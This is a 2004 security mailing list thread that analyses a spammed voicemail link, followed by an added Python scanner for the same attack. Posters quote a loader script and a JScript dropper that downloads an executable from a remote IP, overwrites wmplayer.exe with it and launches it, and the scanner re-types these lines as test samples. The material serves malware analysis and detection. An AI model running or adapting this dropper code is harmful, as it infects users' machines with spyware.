Full Disclosure mailing list archives
Re: spamming trojan?
From: joe smith <joe () joesmith homeip net>
Date: Wed, 16 Jun 2004 13:25:19 -0500
I used PE Explorer. Looks the june4.exe is some kind of spyware. It reference to another site "cjdra.com", possibly uploading user information there. I just started learning assembly, please pardon my lack of knowledge on reverse engineering.
J Michael Gargiullo wrote:
> On Wed, 2004-06-16 at 13:41, joe smith wrote:
> > The file is UPX packed and within the file there is another "GET" pointing to "http://219.234.95.124/june4.exe"
> > J
>
> Like those Chinese stacking dolls... How'd you unpack it?
>
> > Michael Gargiullo wrote:
> > > On Wed, 2004-06-16 at 08:23, Geo. wrote:
> > > > Received a spam this morning claiming I have a voicemail with the link (warning do not click the link) http:-//www-1voicemailbox-net/voicemail/ (dashes added by me) which brings up a frames based page with one of the frames containing this
> > > >
> > > > function InjectedDuringRedirection(){
> > > >   showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
> > > >
> > > > Anyone want to try and analyze what this thing is? It was spammed to about 30 addresses here this morning.
> > > >
> > > > Geo.
> > >
> > > Here's the contents:
> > >
> > > var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); x.Send();
> > > var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
> > > s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://";
> > >
> > > so whatever w_e_d.exe is...
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
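An added example, not code from the thread or from any of its posters: a small scanner for the drive-by dropper pattern quoted above (XMLHTTP fetch, ADODB.Stream write over a trusted binary, launch via a URL handler, and the showModalDialog loader). The samples are re-typed from the message and constructed for testing; the indicator names and the function names analyze_script and overwrites_trusted_binary are this example's own.

```python
import re

# Constructed samples: the loader and dropper snippets quoted in this thread,
# re-typed here (nothing is fetched), plus a benign fetch for comparison.
LOADER = r'''function InjectedDuringRedirection(){ showModalDialog('md.htm',window,"dialogTop:-10000\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'"; }'''
DROPPER = r'''var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0); x.Send();
var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://";'''
BENIGN = r'''var r = new XMLHttpRequest(); r.open("GET", "/api/status.json"); r.send();'''

# Indicators for each step of the chain described in the thread (names are this example's own).
INDICATORS = {
    "xmlhttp":        re.compile(r'ActiveXObject\(\s*["\']Microsoft\.XMLHTTP["\']', re.I),
    "adodb_stream":   re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', re.I),
    "remote_fetch":   re.compile(r'\.Open\(\s*["\']GET["\']\s*,\s*["\'](https?://[^"\']+)["\']', re.I),
    "save_to_file":   re.compile(r'\.SaveToFile\(\s*["\']([^"\']+)["\']', re.I),
    "handler_launch": re.compile(r'location\.href\s*=\s*["\'][a-z]+://["\']', re.I),
    "modal_inject":   re.compile(r'showModalDialog\(.*?\.location\s*=\s*["\']javascript:', re.I | re.S),
}

def analyze_script(src):
    """Report which indicators fire, the fetch URL and drop path, and a verdict."""
    hits = {name: rx.search(src) for name, rx in INDICATORS.items()}
    found = {name: m is not None for name, m in hits.items()}
    report = {"found": found, "fetch_url": None, "drop_path": None, "verdict": "clean"}
    if hits["remote_fetch"]:
        report["fetch_url"] = hits["remote_fetch"].group(1)
    if hits["save_to_file"]:
        report["drop_path"] = hits["save_to_file"].group(1)
    # Full chain: fetch an .exe via XMLHTTP, write it to disk with ADODB.Stream,
    # then rely on a protocol handler (mms://) to execute the overwritten binary.
    if found["xmlhttp"] and found["adodb_stream"] and found["save_to_file"]:
        report["verdict"] = "dropper"
    elif found["adodb_stream"] or found["save_to_file"] or found["modal_inject"]:
        report["verdict"] = "suspicious"
    return report

def overwrites_trusted_binary(drop_path):
    """True when the SaveToFile target is an .exe under Program Files or Windows."""
    if not drop_path:
        return False
    p = drop_path.replace("\\\\", "\\").lower()   # collapse JS-escaped backslashes
    return p.endswith(".exe") and ("\\program files\\" in p or "\\windows\\" in p)

if __name__ == "__main__":
    for name, sample in (("loader", LOADER), ("dropper", DROPPER), ("benign", BENIGN)):
        r = analyze_script(sample)
        print(name, r["verdict"], r["fetch_url"], r["drop_path"], overwrites_trusted_binary(r["drop_path"]))
```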